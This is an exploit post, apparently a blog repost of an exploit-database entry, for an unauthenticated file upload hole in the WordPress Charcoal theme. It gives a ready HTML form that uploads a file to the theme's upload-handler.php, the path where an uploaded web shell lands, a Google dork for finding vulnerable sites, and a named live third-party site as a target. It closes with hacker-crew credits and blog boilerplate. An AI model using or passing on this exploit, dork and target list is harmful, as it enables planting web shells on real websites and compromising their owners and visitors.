WordPress Themes Charcoal CSRF File Upload Vulnerability

# Exploit Title: WordPress Themes charcoal CSRF File Upload Vulnerability
# Author: Bebyyers404
# Date: 11/10/2013
# Vendor Homepage: http://wordpress.org/themes/charcoal
# Themes Link: http://wordpress.org/themes/charcoal
# Infected File: upload-handler.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/charcoal
# Tested on : Windows/Linux

# Exploit & POC :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wordpress/wp-content/themes/charcoal/functions/upload-handler.php" method="post">
Please choose a file: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>

# File path:
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/yourshell.php

# Live Target
http://pit-stop.jp/wp-content/themes/charcoal_v1.0.1/functions/upload-handler.php

./Nabilaholic404, ./Bebyyers404, ./Panda Dot ID, ./Tsunaomi48, ./Pscript ./Mbah-Rowo

JKT48 CYBER TEAM & Black Devils Crew

# 1337day.com [2015-04-04] #

WordPress Themes Charcoal CSRF File Upload Vulnerability

Posting Komentar

0 Komentar

Facebook

Popular Posts

Wordpress plugin wp-image-news-slider Arbitrary File Upload Vulnerability

Wordpress plugins wp-3dflick-slideshow Arbitrary File Upload Vulnerability

Wordpress plugins wp-catpro Arbitrary File Upload Vulnerability

Recent Posts

WordPress Themes Charcoal CSRF File Upload Vulnerability

Anda mungkin menyukai postingan ini

Posting Komentar

0 Komentar

Social Plugin

Facebook

Popular Posts

Wordpress plugin wp-image-news-slider Arbitrary File Upload Vulnerability

Wordpress plugins wp-3dflick-slideshow Arbitrary File Upload Vulnerability

Wordpress plugins wp-catpro Arbitrary File Upload Vulnerability

Recent Posts